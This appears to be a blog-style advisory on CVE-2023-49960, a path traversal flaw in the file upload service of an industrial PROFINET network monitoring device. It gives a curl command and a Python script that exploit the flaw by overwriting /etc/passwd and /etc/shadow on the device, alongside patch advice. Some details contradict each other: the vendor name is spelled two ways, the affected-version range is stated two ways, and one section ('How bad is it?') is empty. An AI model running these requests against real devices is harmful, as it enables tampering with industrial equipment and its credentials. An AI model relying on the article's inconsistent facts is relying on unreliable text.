CVE-2023-49960 - Path Traversal in Indo-Sol PROFINET-INspektor NT lets Hackers Write Files on Device

In late 2023, security researchers discovered a major vulnerability in the Indo-Sol PROFINET-INspektor NT industrial network monitoring device, tracked as CVE-2023-49960. This flaw exposes crucial industrial environments to a simple, yet dangerous, attack that allows remote hackers to write arbitrary files anywhere on the device's storage. Let’s break down what went wrong, how it can be exploited, and how you can protect your network.

What is Indo-Sol PROFINET-INspektor NT?

The PROFINET-INspektor NT is a network monitoring and diagnostic device used in industrial settings. It helps maintenance teams check on PROFINET networks (industrial Ethernet) to spot problems. But like many "Industrial IoT" devices, its web features can be a weak spot.

Firmware Affected: All versions through 2.4.
Vulnerable Service: httpuploadd
Vulnerable Endpoint: /upload

The Bug: Path Traversal in the Upload Service

The issue lies in the firmware's file upload service. When a user uploads a file, the device accepts a filename parameter. The service fails to sanitize this data, enabling path traversal: attackers can include directory paths like ../../ to break out of the intended upload folder and write files *anywhere* the device allows.

How to Exploit CVE-2023-49960

Let’s see how an attacker would actually exploit this bug. All it takes is a simple HTTP POST request to the /upload endpoint.

Suppose the device is at http://192.168.1.100, and the attacker wants to overwrite /etc/passwd (the file that manages system users in Linux).

Here’s a classic cURL command to exploit the flaw

curl -X POST \
     -F "filename=../../../../etc/passwd" \
     -F "file=@malicious_passwd" \
     http://192.168.1.100/upload

Here, filename=../../../../etc/passwd tells the device to break out of the usual folder and target /etc/passwd. The file being uploaded is malicious_passwd from the attacker's system.

Note: This is a *theoretical* example. Overwriting /etc/passwd could break the system immediately!

Here’s a more detailed Python script

import requests

url = 'http://192.168.1.100/upload'
files = {
    'filename': (None, '../../../../etc/shadow'),
    'file': ('shadow', open('malicious_shadow', 'rb'))
}
r = requests.post(url, files=files)
print(r.status_code)
print(r.text)

Caution: Never run this on anything you don't own—it's illegal on others' systems.

Real-World Risk

Who is at risk?
Any factory, plant, or facility using PROFINET-INspektor NT before 2.4. and exposing its web interface to the network—especially if accessible from outside.

How bad is it?

How To Fix CVE-2023-49960

Vendor Patch: Indo-Sol has released firmware 2.4.1, which blocks this path traversal.
- Vendor Advisory (in German)
- CVE Details

References

- Vendor Security Bulletin (German)
- CVE-2023-49960 on MITRE
- PROFINET-INspektor Product Page (Indu-Sol)
- Path Traversal Attacks Explained

Summary

CVE-2023-49960 is a textbook example of how poor input validation can lead to critical security holes, even in industrial devices. If you use Indo-Sol's PROFINET-INspektor NT, update it today and never expose its web interface to untrusted networks!

Stay Vigilant. Secure your industrial networks.

*This article is for educational purposes only. Never attempt exploitation on networks you do not own.*

Timeline

Published on: 02/26/2024 16:27:47 UTC
Last modified on: 08/01/2024 13:45:17 UTC